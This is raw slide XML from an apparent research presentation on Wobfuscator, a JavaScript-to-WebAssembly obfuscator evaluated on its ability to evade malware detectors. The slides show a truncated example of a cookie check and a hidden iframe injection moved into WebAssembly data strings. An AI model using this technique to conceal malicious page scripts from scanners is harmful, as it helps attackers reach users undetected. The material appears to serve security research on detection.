                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a: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595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>// omitted function checkCookie() {...}</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1">
              <a:solidFill>
                <a:srgbClr val="595959"/>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x33 = checkCookie();</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 =&gt; {</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_ifInstance0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WebAssembly.Instance(_ifWasmModule,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ifImp: () =&gt; {</a:t>
            </a:r>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 =</a:t>
            </a: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.createElement(_loadString(0,1));</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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>    var</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x22q = _loadString(0,2) + x33;</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x22.innerHTML = _loadString(0,3) + x22q + _loadString(0,4);</a:t>
            </a:r>
            <a:endParaRPr sz="11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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>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 =&gt;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_callInstance0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>new</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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt; { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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elseImp: () =&gt;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lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>_exports = _ifInstance0.exports;</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_exports.if_func(x33 ? 1 : 0);</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  })();</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1100"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SzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1150" b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="830" name="Google Shape;830;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2450656"/>
            <a:ext cx="4670144" cy="1311872"/>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831" name="Google Shape;831;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="1917637"/>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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="2084570"/>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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425" y="226777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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164" y="2267776"/>
            <a:ext cx="1097280" cy="164592"/>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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435852"/>
            <a:ext cx="4846320" cy="3346009"/>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6" name="Google Shape;836;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="822960"/>
            <a:ext cx="3675887" cy="423192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module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$t0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>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$t1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param</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$f0</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100" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="383A42"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="E45649"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$f2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import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"env"</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"elseImport"</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"call_func"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func</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"if_func"</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type</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$t1</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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="A0A1A7"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;; label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call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986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$f2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A626A4"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>end</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"g3"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="A0A1A7"/>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"g4"</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"g5"</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global</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"g6"</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memory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export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"memory"</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986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> 0</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$d1</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0</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div\00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$d2</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12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>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http_://…\00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$d3</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432</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&lt;div sty…\00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A626A4"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>data</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E45649"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$d4</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C18401"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>i32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>548</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </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A31515"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>'&gt;&lt;/ifra…\00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="50A14F"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"</a:t>
            </a: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595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="837" name="Google Shape;837;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1168542"/>
            <a:ext cx="3383280" cy="171986"/>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8" name="Google Shape;838;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1506877"/>
            <a:ext cx="3383280" cy="339677"/>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9" name="Google Shape;839;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="2174455"/>
            <a:ext cx="3383280" cy="1181304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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0" name="Google Shape;840;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="3381158"/>
            <a:ext cx="3383280" cy="146304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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1869372"/>
            <a:ext cx="3383280" cy="274320"/>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842" name="Google Shape;842;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1005882"/>
            <a:ext cx="3383280" cy="137160"/>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843" name="Google Shape;843;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1350646"/>
            <a:ext cx="3383280" cy="137160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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B0F0"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Google Shape;844;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69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="858238"/>
            <a:ext cx="8520600" cy="410451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sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Wobfuscator is effective</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Evade state-of-the-art malware detectors </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Outperform other obfuscators</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Wobfuscator preserves semantics</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Use the test suites of 6 widely used JavaScript projects</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Wobfuscator is efficient</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Average runtime increases by 0.31x</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Average code size increases by 1.70x</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-575300" y="1680325"/>
            <a:ext cx="9901500" cy="3463200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1">
              <a:alpha val="8274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1" name="Google Shape;851;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="180753"/>
            <a:ext cx="8520600" cy="677484"/>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Evaluation</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="852" name="Google Shape;852;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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="180753"/>
            <a:ext cx="8520600" cy="677484"/>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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Datasets for Evaluating Effectiveness </a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="858" name="Google Shape;858;p70"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1444529" y="1828021"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{19842F14-65A5-4413-9061-7BFCEAB78F2E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1432850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2477500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2344600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="295975">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solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Datasets</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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endParaRPr sz="2000" b="0" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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2000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="2000" u="none" strike="noStrike" cap="none">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t># Samples (Files)</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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95975">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latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Benign</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"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latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
